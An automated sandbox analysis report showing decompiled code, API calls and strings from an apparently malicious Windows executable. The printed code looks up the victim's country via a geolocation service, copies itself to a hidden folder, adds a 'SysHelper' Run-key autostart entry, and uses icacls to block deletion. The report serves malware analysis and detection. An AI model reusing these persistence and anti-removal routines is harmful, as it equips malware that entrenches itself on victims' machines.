                                                                                                    0x0040d084
                                                                                                    0x0040d08b
                                                                                                    0x0040d091
                                                                                                    0x0040d096
                                                                                                    0x0040d09b
                                                                                                    0x0040d09b
                                                                                                    0x0040d0a2
                                                                                                    0x0040d0a9
                                                                                                    0x0040d0b0
                                                                                                    0x0040d0b4
                                                                                                    0x0040d0b4
                                                                                                    0x0040d0bd
                                                                                                    0x0040d0c5
                                                                                                    0x0040d0ca
                                                                                                    0x0040d0ca
                                                                                                    0x0040d0e1
                                                                                                    0x00000000
                                                                                                    0x0040d0e7
                                                                                                    0x0040d0f1
                                                                                                    0x0040d0f6
                                                                                                    0x0040d0f9
                                                                                                    0x0040d0fb
                                                                                                    0x0040d105
                                                                                                    0x0040d10f
                                                                                                    0x0040d119
                                                                                                    0x0040d123
                                                                                                    0x0040d12d
                                                                                                    0x0040d134
                                                                                                    0x0040d13b
                                                                                                    0x0040d142
                                                                                                    0x0040d149
                                                                                                    0x0040d150
                                                                                                    0x0040d150
                                                                                                    0x0040d15a
                                                                                                    0x0040d160
                                                                                                    0x0040d162
                                                                                                    0x0040d162
                                                                                                    0x0040d165
                                                                                                    0x0040d165
                                                                                                    0x0040d167
                                                                                                    0x0040d168
                                                                                                    0x0040d16c
                                                                                                    0x0040d15c
                                                                                                    0x0040d15c
                                                                                                    0x0040d15c
                                                                                                    0x0040d177
                                                                                                    0x0040d17d
                                                                                                    0x0040d181
                                                                                                    0x0040d186
                                                                                                    0x0040d18b
                                                                                                    0x00000000
                                                                                                    0x0040d1c7
                                                                                                    0x0040d1c7
                                                                                                    0x0040d1c7
                                                                                                    0x0040d1a2
                                                                                                    0x0040d1a6
                                                                                                    0x0040d1ab
                                                                                                    0x0040d1b0
                                                                                                    0x0040d1b0
                                                                                                    0x0040d1b3
                                                                                                    0x0040d1ba
                                                                                                    0x0040d1c1
                                                                                                    0x00000000
                                                                                                    0x0040d19a
                                                                                                    0x0040d19a
                                                                                                    0x0040d19b
                                                                                                    0x0040d1a0
                                                                                                    0x00000000
                                                                                                    0x0040d1a0
                                                                                                    0x0040d0e1
                                                                                                    0x0040d1cd
                                                                                                    0x0040d1d1
                                                                                                    0x0040d1d6
                                                                                                    0x0040d1db
                                                                                                    0x0040d1db
                                                                                                    0x0040d1e2
                                                                                                    0x0040d1e9
                                                                                                    0x0040d1f0
                                                                                                    0x0040d1f4
                                                                                                    0x0040d1f9
                                                                                                    0x0040d1fe
                                                                                                    0x0040d1fe
                                                                                                    0x0040d201
                                                                                                    0x0040d208
                                                                                                    0x0040d20f
                                                                                                    0x0040cfb2
                                                                                                    0x0040cfb2
                                                                                                    0x0040cfb2
                                                                                                    0x0040d217
                                                                                                    0x0040d21c
                                                                                                    0x0040d221
                                                                                                    0x0040d22b
                                                                                                    0x0040d236

                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 0040CF4A
                                                                                                    • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                    • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                    Strings
                                                                                                    • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                    • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                    • "country_code":", xrefs: 0040CFE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                    • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                    • API String ID: 1485416377-2962370585
                                                                                                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                    • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                    • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 635 411f36-411f38 622->635 636 411f3a-411f3f 622->636 623->622 633 411e3c-411e50 PathFileExistsW 629->633 634 411e2e-411e39 call 422587 629->634 631 411e00 630->631 632 411e0b-411e1f 630->632 637 411e03-411e08 call 422587 631->637 638 411e23 call 4145a0 632->638 633->621 642 411e52-411e57 633->642 634->633 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 635->640 641 411f40-411f49 636->641 637->632 638->629 654 411f98-411fa0 640->654 655 411fce-411fe9 640->655 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 652 4121ff-412204 call 422587 651->652 652->610 659 411fa2-411fa4 654->659 660 411fa6-411faf 654->660 656 411feb-411fed 655->656 657 411fef-411ff8 655->657 664 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->664 665 412000-412009 657->665 662 411fbf-411fc9 call 415c10 659->662 663 411fb0-411fb9 660->663 662->655 663->663 666 411fbb-411fbd 663->666 671 4121d1-4121d5 664->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 664->672 665->665 668 41200b-41200d 665->668 666->662 668->664 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 679 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->679 680 412109-412110 call 413260 672->680 673->610 677 4121fc 673->677 674->673 677->652 685 4121b2-4121b8 679->685 686 4121aa-4121b0 GetLastError 679->686 680->679 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                    C-Code - Quality: 77%
                                                                                                    			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
                                                                                                    				long _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				WCHAR* _v24;
                                                                                                    				void* _v28;
                                                                                                    				void* _v32;
                                                                                                    				int _v36;
                                                                                                    				intOrPtr _v40;
                                                                                                    				WCHAR* _v44;
                                                                                                    				char _v60;
                                                                                                    				int _v64;
                                                                                                    				intOrPtr _v68;
                                                                                                    				WCHAR* _v72;
                                                                                                    				char _v88;
                                                                                                    				int _v92;
                                                                                                    				intOrPtr _v96;
                                                                                                    				WCHAR* _v100;
                                                                                                    				char _v116;
                                                                                                    				intOrPtr _v120;
                                                                                                    				char _v140;
                                                                                                    				struct _PROCESS_INFORMATION _v156;
                                                                                                    				char _v172;
                                                                                                    				struct _STARTUPINFOW _v248;
                                                                                                    				short _v2296;
                                                                                                    				char _v4342;
                                                                                                    				short _v4344;
                                                                                                    				char _v6390;
                                                                                                    				char _v6392;
                                                                                                    				short _v8440;
                                                                                                    				short _v12536;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				int _t124;
                                                                                                    				intOrPtr _t133;
                                                                                                    				_Unknown_base(*)()* _t137;
                                                                                                    				short _t150;
                                                                                                    				intOrPtr _t160;
                                                                                                    				long _t171;
                                                                                                    				int _t202;
                                                                                                    				intOrPtr _t207;
                                                                                                    				void* _t213;
                                                                                                    				void* _t221;
                                                                                                    				intOrPtr* _t223;
                                                                                                    				signed int _t225;
                                                                                                    				WCHAR* _t228;
                                                                                                    				signed int _t230;
                                                                                                    				intOrPtr* _t232;
                                                                                                    				signed int _t234;
                                                                                                    				intOrPtr* _t237;
                                                                                                    				signed int _t239;
                                                                                                    				intOrPtr _t242;
                                                                                                    				void* _t245;
                                                                                                    				WCHAR* _t246;
                                                                                                    				void* _t247;
                                                                                                    				void* _t248;
                                                                                                    				void* _t250;
                                                                                                    				void* _t253;
                                                                                                    				void* _t257;
                                                                                                    				intOrPtr _t263;
                                                                                                    				void* _t264;
                                                                                                    				void* _t266;
                                                                                                    
                                                                                                    				_t221 = __ebx;
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4cac68);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t263;
                                                                                                    				E0042F7C0(0x30e8);
                                                                                                    				_push(_t253);
                                                                                                    				_v32 = 0;
                                                                                                    				_t250 = __edx; // executed
                                                                                                    				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32); // executed
                                                                                                    				if(_t124 != 0) {
                                                                                                    					L50:
                                                                                                    					 *[fs:0x0] = _v16;
                                                                                                    					return _t124;
                                                                                                    				}
                                                                                                    				_v6392 = _t124;
                                                                                                    				_v36 = 1;
                                                                                                    				E0042B420( &_v6390, _t124, 0x7fe);
                                                                                                    				_t264 = _t263 + 0xc;
                                                                                                    				_v64 = 0x400;
                                                                                                    				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64); // executed
                                                                                                    				RegCloseKey(_v32);
                                                                                                    				_v40 = 7;
                                                                                                    				_v44 = 0;
                                                                                                    				_v60 = 0;
                                                                                                    				if(_v6392 != 0) {
                                                                                                    					_t223 =  &_v6392;
                                                                                                    					_t245 = _t223 + 2;
                                                                                                    					do {
                                                                                                    						_t133 =  *_t223;
                                                                                                    						_t223 = _t223 + 2;
                                                                                                    					} while (_t133 != 0);
                                                                                                    					_t225 = _t223 - _t245 >> 1;
                                                                                                    					L6:
                                                                                                    					_push(_t225);
                                                                                                    					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
                                                                                                    					_v8 = 0;
                                                                                                    					_t255 = _v44;
                                                                                                    					if(_v44 == 0) {
                                                                                                    						L19:
                                                                                                    						_v8 = 0xffffffff;
                                                                                                    						if(_v40 >= 8) {
                                                                                                    							L00422587(_v60);
                                                                                                    							_t264 = _t264 + 4;
                                                                                                    						}
                                                                                                    						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
                                                                                                    						_t256 = _t137;
                                                                                                    						_v92 = 0;
                                                                                                    						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
                                                                                                    						_v36 = PathFindFileNameW( &_v8440);
                                                                                                    						 *_t137(0, 0x1c, 0, 0,  &_v2296);
                                                                                                    						__imp__UuidCreate( &_v172);
                                                                                                    						_v24 = 0;
                                                                                                    						__imp__UuidToStringW( &_v172,  &_v24);
                                                                                                    						_t246 = _v24;
                                                                                                    						_v96 = 7;
                                                                                                    						_v100 = 0;
                                                                                                    						_v116 = 0;
                                                                                                    						if( *_t246 != 0) {
                                                                                                    							_t228 = _t246;
                                                                                                    							_t57 =  &(_t228[1]); // 0x2
                                                                                                    							_t256 = _t57;
                                                                                                    							do {
                                                                                                    								_t150 =  *_t228;
                                                                                                    								_t228 =  &(_t228[1]);
                                                                                                    							} while (_t150 != 0);
                                                                                                    							_t230 = _t228 - _t256 >> 1;
                                                                                                    							goto L26;
                                                                                                    						} else {
                                                                                                    							_t230 = 0;
                                                                                                    							L26:
                                                                                                    							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
                                                                                                    							_v8 = 1;
                                                                                                    							__imp__RpcStringFreeW( &_v24, _t230);
                                                                                                    							_t257 = PathAppendW;
                                                                                                    							_t154 =  >=  ? _v116 :  &_v116;
                                                                                                    							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
                                                                                                    							CreateDirectoryW( &_v2296, 0); // executed
                                                                                                    							if(_t250 == 0) {
                                                                                                    								L33:
                                                                                                    								_v68 = 7;
                                                                                                    								_v72 = 0;
                                                                                                    								_v88 = 0;
                                                                                                    								if(_v2296 != 0) {
                                                                                                    									_t232 =  &_v2296;
                                                                                                    									_t247 = _t232 + 2;
                                                                                                    									do {
                                                                                                    										_t160 =  *_t232;
                                                                                                    										_t232 = _t232 + 2;
                                                                                                    									} while (_t160 != 0);
                                                                                                    									_t234 = _t232 - _t247 >> 1;
                                                                                                    									L38:
                                                                                                    									_push(_t234);
                                                                                                    									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
                                                                                                    									_v8 = 2;
                                                                                                    									PathAppendW( &_v2296, _v36);
                                                                                                    									DeleteFileW( &_v2296); // executed
                                                                                                    									CopyFileW( &_v8440,  &_v2296, 0); // executed
                                                                                                    									_v28 = 0;
                                                                                                    									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28); // executed
                                                                                                    									if(_t171 != 0) {
                                                                                                    										L45:
                                                                                                    										if(_v68 >= 8) {
                                                                                                    											L00422587(_v88);
                                                                                                    											_t264 = _t264 + 4;
                                                                                                    										}
                                                                                                    										_t124 = 0;
                                                                                                    										_v68 = 7;
                                                                                                    										_v72 = 0;
                                                                                                    										_v88 = 0;
                                                                                                    										if(_v96 >= 8) {
                                                                                                    											_push(_v116);
                                                                                                    											L49:
                                                                                                    											_t124 = L00422587();
                                                                                                    										}
                                                                                                    										goto L50;
                                                                                                    									}
                                                                                                    									_v4344 = _t171;
                                                                                                    									E0042B420( &_v4342, _t171, 0x7fe);
                                                                                                    									_t266 = _t264 + 0xc;
                                                                                                    									lstrcpyW( &_v4344, "\"");
                                                                                                    									lstrcatW( &_v4344,  &_v2296);
                                                                                                    									lstrcatW( &_v4344, L"\" --AutoStart");
                                                                                                    									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183); // executed
                                                                                                    									RegCloseKey(_v28);
                                                                                                    									_t236 = _a4;
                                                                                                    									if(_a4 != 0) {
                                                                                                    										E00413260(_t236, lstrcpyW,  &_v2296);
                                                                                                    									}
                                                                                                    									E0042B420( &_v248, 0, 0x44);
                                                                                                    									_t264 = _t266 + 0xc;
                                                                                                    									_v248.cb = 0x44;
                                                                                                    									_v248.dwFlags = 1;
                                                                                                    									_v248.wShowWindow = 0;
                                                                                                    									SetLastError(0);
                                                                                                    									lstrcpyW( &_v12536, L"icacls \"");
                                                                                                    									_t194 =  >=  ? _v88 :  &_v88;
                                                                                                    									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
                                                                                                    									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
                                                                                                    									_t202 = CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156); // executed
                                                                                                    									if(_t202 != 0) {
                                                                                                    										do {
                                                                                                    										} while (WaitForSingleObject(_v156, 1) == 0x102);
                                                                                                    									} else {
                                                                                                    										GetLastError();
                                                                                                    									}
                                                                                                    									goto L45;
                                                                                                    								}
                                                                                                    								_t234 = 0;
                                                                                                    								goto L38;
                                                                                                    							}
                                                                                                    							if(_v2296 != 0) {
                                                                                                    								_t237 =  &_v2296;
                                                                                                    								_t68 = _t237 + 2; // 0x2
                                                                                                    								_t248 = _t68;
                                                                                                    								do {
                                                                                                    									_t207 =  *_t237;
                                                                                                    									_t237 = _t237 + 2;
                                                                                                    								} while (_t207 != 0);
                                                                                                    								_t239 = _t237 - _t248 >> 1;
                                                                                                    								L32:
                                                                                                    								_push(_t239);
                                                                                                    								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
                                                                                                    								goto L33;
                                                                                                    							}
                                                                                                    							_t239 = 0;
                                                                                                    							goto L32;
                                                                                                    						}
                                                                                                    					}
                                                                                                    					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
                                                                                                    					_t262 = _t213;
                                                                                                    					if( &_v60 != _t213) {
                                                                                                    						if(_v40 >= 8) {
                                                                                                    							L00422587(_v60);
                                                                                                    							_t264 = _t264 + 4;
                                                                                                    						}
                                                                                                    						_v40 = 7;
                                                                                                    						_v44 = 0;
                                                                                                    						_v60 = 0;
                                                                                                    						E004145A0( &_v60, _t262);
                                                                                                    					}
                                                                                                    					if(_v120 >= 8) {
                                                                                                    						L00422587(_v140);
                                                                                                    						_t264 = _t264 + 4;
                                                                                                    					}
                                                                                                    					_t216 =  >=  ? _v60 :  &_v60;
                                                                                                    					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
                                                                                                    					if(_t124 == 0) {
                                                                                                    						goto L19;
                                                                                                    					} else {
                                                                                                    						_t242 = _a4;
                                                                                                    						if(_t242 != 0) {
                                                                                                    							_t124 =  &_v60;
                                                                                                    							if(_t242 != _t124) {
                                                                                                    								_push(0xffffffff);
                                                                                                    								_t124 = E00414690(_t221, _t242, _t124, 0);
                                                                                                    							}
                                                                                                    						}
                                                                                                    						if(_v40 < 8) {
                                                                                                    							goto L50;
                                                                                                    						} else {
                                                                                                    							_push(_v60);
                                                                                                    							goto L49;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_t225 = 0;
                                                                                                    				goto L6;
                                                                                                    			}
































































                                                                                                    0x00411cd0
                                                                                                    0x00411cd9
                                                                                                    0x00411cdb
                                                                                                    0x00411ce0
                                                                                                    0x00411ce6
                                                                                                    0x00411ced
                                                                                                    0x00411cf2
                                                                                                    0x00411cf7
                                                                                                    0x00411d10
                                                                                                    0x00411d12
                                                                                                    0x00411d1a
                                                                                                    0x00412207
                                                                                                    0x0041220b
                                                                                                    0x00412216
                                                                                                    0x00412216
                                                                                                    0x00411d26
                                                                                                    0x00411d34
                                                                                                    0x00411d3b
                                                                                                    0x00411d40
                                                                                                    0x00411d43
                                                                                                    0x00411d63
                                                                                                    0x00411d6c
                                                                                                    0x00411d74
                                                                                                    0x00411d7b
                                                                                                    0x00411d82
                                                                                                    0x00411d8d
                                                                                                    0x00411d93
                                                                                                    0x00411d99
                                                                                                    0x00411da0
                                                                                                    0x00411da0
                                                                                                    0x00411da3
                                                                                                    0x00411da6
                                                                                                    0x00411dad
                                                                                                    0x00411daf
                                                                                                    0x00411daf
                                                                                                    0x00411dba
                                                                                                    0x00411dbf
                                                                                                    0x00411dc6
                                                                                                    0x00411dcb
                                                                                                    0x00411e7c
                                                                                                    0x00411e7c
                                                                                                    0x00411e87
                                                                                                    0x00411e8c
                                                                                                    0x00411e91
                                                                                                    0x00411e91
                                                                                                    0x00411ea5
                                                                                                    0x00411eab
                                                                                                    0x00411ead
                                                                                                    0x00411ece
                                                                                                    0x00411ee1
                                                                                                    0x00411ef3
                                                                                                    0x00411efc
                                                                                                    0x00411f05
                                                                                                    0x00411f14
                                                                                                    0x00411f1a
                                                                                                    0x00411f1f
                                                                                                    0x00411f26
                                                                                                    0x00411f2d
                                                                                                    0x00411f34
                                                                                                    0x00411f3a
                                                                                                    0x00411f3c
                                                                                                    0x00411f3c
                                                                                                    0x00411f40
                                                                                                    0x00411f40
                                                                                                    0x00411f43
                                                                                                    0x00411f46
                                                                                                    0x00411f4d
                                                                                                    0x00000000
                                                                                                    0x00411f36
                                                                                                    0x00411f36
                                                                                                    0x00411f4f
                                                                                                    0x00411f54
                                                                                                    0x00411f5c
                                                                                                    0x00411f64
                                                                                                    0x00411f71
                                                                                                    0x00411f77
                                                                                                    0x00411f83
                                                                                                    0x00411f8e
                                                                                                    0x00411f96
                                                                                                    0x00411fce
                                                                                                    0x00411fd0
                                                                                                    0x00411fd7
                                                                                                    0x00411fde
                                                                                                    0x00411fe9
                                                                                                    0x00411fef
                                                                                                    0x00411ff5
                                                                                                    0x00412000
                                                                                                    0x00412000
                                                                                                    0x00412003
                                                                                                    0x00412006
                                                                                                    0x0041200d
                                                                                                    0x0041200f
                                                                                                    0x0041200f
                                                                                                    0x0041201a
                                                                                                    0x0041201f
                                                                                                    0x0041202d
                                                                                                    0x00412036
                                                                                                    0x0041204c
                                                                                                    0x00412055
                                                                                                    0x0041206e
                                                                                                    0x00412076
                                                                                                    0x004121d1
                                                                                                    0x004121d5
                                                                                                    0x004121da
                                                                                                    0x004121df
                                                                                                    0x004121df
                                                                                                    0x004121e2
                                                                                                    0x004121e4
                                                                                                    0x004121ef
                                                                                                    0x004121f6
                                                                                                    0x004121fa
                                                                                                    0x004121fc
                                                                                                    0x004121ff
                                                                                                    0x004121ff
                                                                                                    0x00412204
                                                                                                    0x00000000
                                                                                                    0x004121fa
                                                                                                    0x00412082
                                                                                                    0x00412090
                                                                                                    0x004120a1
                                                                                                    0x004120aa
                                                                                                    0x004120c0
                                                                                                    0x004120ce
                                                                                                    0x004120f3
                                                                                                    0x004120fc
                                                                                                    0x00412102
                                                                                                    0x00412107
                                                                                                    0x00412110
                                                                                                    0x00412110
                                                                                                    0x00412120
                                                                                                    0x00412125
                                                                                                    0x00412128
                                                                                                    0x00412134
                                                                                                    0x0041213e
                                                                                                    0x00412146
                                                                                                    0x00412158
                                                                                                    0x00412161
                                                                                                    0x0041216d
                                                                                                    0x0041217b
                                                                                                    0x004121a0
                                                                                                    0x004121a8
                                                                                                    0x004121c0
                                                                                                    0x004121ca
                                                                                                    0x004121aa
                                                                                                    0x004121aa
                                                                                                    0x004121aa
                                                                                                    0x00000000
                                                                                                    0x004121a8
                                                                                                    0x00411feb
                                                                                                    0x00000000
                                                                                                    0x00411feb
                                                                                                    0x00411fa0
                                                                                                    0x00411fa6
                                                                                                    0x00411fac
                                                                                                    0x00411fac
                                                                                                    0x00411fb0
                                                                                                    0x00411fb0
                                                                                                    0x00411fb3
                                                                                                    0x00411fb6
                                                                                                    0x00411fbd
                                                                                                    0x00411fbf
                                                                                                    0x00411fbf
                                                                                                    0x00411fc9
                                                                                                    0x00000000
                                                                                                    0x00411fc9
                                                                                                    0x00411fa2
                                                                                                    0x00000000
                                                                                                    0x00411fa2
                                                                                                    0x00411f34
                                                                                                    0x00411dec
                                                                                                    0x00411df1
                                                                                                    0x00411df8
                                                                                                    0x00411dfe
                                                                                                    0x00411e03
                                                                                                    0x00411e08
                                                                                                    0x00411e08
                                                                                                    0x00411e0d
                                                                                                    0x00411e18
                                                                                                    0x00411e1f
                                                                                                    0x00411e23
                                                                                                    0x00411e23
                                                                                                    0x00411e2c
                                                                                                    0x00411e34
                                                                                                    0x00411e39
                                                                                                    0x00411e39
                                                                                                    0x00411e43
                                                                                                    0x00411e48
                                                                                                    0x00411e50
                                                                                                    0x00000000
                                                                                                    0x00411e52
                                                                                                    0x00411e52
                                                                                                    0x00411e57
                                                                                                    0x00411e59
                                                                                                    0x00411e5e
                                                                                                    0x00411e60
                                                                                                    0x00411e65
                                                                                                    0x00411e65
                                                                                                    0x00411e5e
                                                                                                    0x00411e6e
                                                                                                    0x00000000
                                                                                                    0x00411e74
                                                                                                    0x00411e74
                                                                                                    0x00000000
                                                                                                    0x00411e74
                                                                                                    0x00411e6e
                                                                                                    0x00411e50
                                                                                                    0x00411d8f
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                    • _memset.LIBCMT ref: 00411D3B
                                                                                                    • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                    • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                    • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                    • lstrcpyW.KERNEL32 ref: 00411ECE
                                                                                                    • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                    • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                    • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                    • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                    • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                    • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                    • _memset.LIBCMT ref: 00412090
                                                                                                    • lstrcpyW.KERNEL32 ref: 004120AA
                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                    • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                    • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                    • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                    • _memset.LIBCMT ref: 00412120
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                    • lstrcpyW.KERNEL32 ref: 00412158
                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                    • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                    • API String ID: 2589766509-1182136429
                                                                                                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                    • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                    • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
